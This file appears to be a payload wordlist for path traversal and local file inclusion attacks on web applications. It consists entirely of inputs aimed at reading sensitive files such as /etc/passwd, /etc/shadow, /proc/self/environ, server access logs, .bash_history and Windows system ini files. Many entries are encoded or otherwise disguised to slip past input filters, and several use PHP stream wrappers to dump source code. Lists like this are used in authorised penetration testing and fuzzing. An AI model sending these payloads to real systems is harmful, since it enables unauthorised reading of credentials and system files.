../etc/passwd
../../etc/passwd
../../../etc/passwd
../../../../etc/passwd
../../../../../etc/passwd
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/proc/self/cmdline
/var/log/apache2/access.log
/var/log/nginx/access.log
../../../../windows/win.ini
../../../../boot.ini
php://filter/convert.base64-encode/resource=index.php
php://filter/convert.base64-encode/resource=/etc/passwd
file:///etc/passwd
etc/passwd
....//....//etc/passwd
..%2fetc/passwd
..%252fetc/passwd
etc/shadow
../etc/shadow
../../etc/shadow
../../../etc/shadow
....//....//etc/shadow
..%2fetc/shadow
..%252fetc/shadow
etc/hosts
../etc/hosts
../../etc/hosts
../../../etc/hosts
....//....//etc/hosts
..%2fetc/hosts
..%252fetc/hosts
etc/group
../etc/group
../../etc/group
../../../etc/group
....//....//etc/group
..%2fetc/group
..%252fetc/group
proc/self/environ
../proc/self/environ
../../proc/self/environ
../../../proc/self/environ
....//....//proc/self/environ
..%2fproc/self/environ
..%252fproc/self/environ
proc/self/cmdline
../proc/self/cmdline
../../proc/self/cmdline
../../../proc/self/cmdline
....//....//proc/self/cmdline
..%2fproc/self/cmdline
..%252fproc/self/cmdline
proc/version
../proc/version
../../proc/version
../../../proc/version
....//....//proc/version
..%2fproc/version
..%252fproc/version
var/log/apache2/access.log
../var/log/apache2/access.log
../../var/log/apache2/access.log
../../../var/log/apache2/access.log
....//....//var/log/apache2/access.log
..%2fvar/log/apache2/access.log
..%252fvar/log/apache2/access.log
var/log/nginx/access.log
../var/log/nginx/access.log
../../var/log/nginx/access.log
../../../var/log/nginx/access.log
....//....//var/log/nginx/access.log
..%2fvar/log/nginx/access.log
..%252fvar/log/nginx/access.log
var/www/html/index.php
../var/www/html/index.php
../../var/www/html/index.php
../../../var/www/html/index.php
....//....//var/www/html/index.php
..%2fvar/www/html/index.php
..%252fvar/www/html/index.php
home/user/.bash_history
../home/user/.bash_history
../../home/user/.bash_history
../../../home/user/.bash_history
....//....//home/user/.bash_history
..%2fhome/user/.bash_history
..%252fhome/user/.bash_history
..\..\..\windows\win.ini
../..\..\..\windows\win.ini
../../..\..\..\windows\win.ini
../../../..\..\..\windows\win.ini
....//....//..\..\..\windows\win.ini
..%2f..\..\..\windows\win.ini
..%252f..\..\..\windows\win.ini
..\..\..\windows\system32\drivers\etc\hosts
../..\..\..\windows\system32\drivers\etc\hosts
../../..\..\..\windows\system32\drivers\etc\hosts
../../../..\..\..\windows\system32\drivers\etc\hosts
....//....//..\..\..\windows\system32\drivers\etc\hosts
..%2f..\..\..\windows\system32\drivers\etc\hosts
..%252f..\..\..\windows\system32\drivers\etc\hosts
C:\windows\win.ini
../C:\windows\win.ini
../../C:\windows\win.ini
../../../C:\windows\win.ini
....//....//C:\windows\win.ini
..%2fC:\windows\win.ini
..%252fC:\windows\win.ini
C:\boot.ini
../C:\boot.ini
../../C:\boot.ini
../../../C:\boot.ini
....//....//C:\boot.ini
..%2fC:\boot.ini
..%252fC:\boot.ini
C:\windows\system.ini
../C:\windows\system.ini
../../C:\windows\system.ini
../../../C:\windows\system.ini
....//....//C:\windows\system.ini
..%2fC:\windows\system.ini
..%252fC:\windows\system.ini
php://inputindex.php
data://text/plain,index.php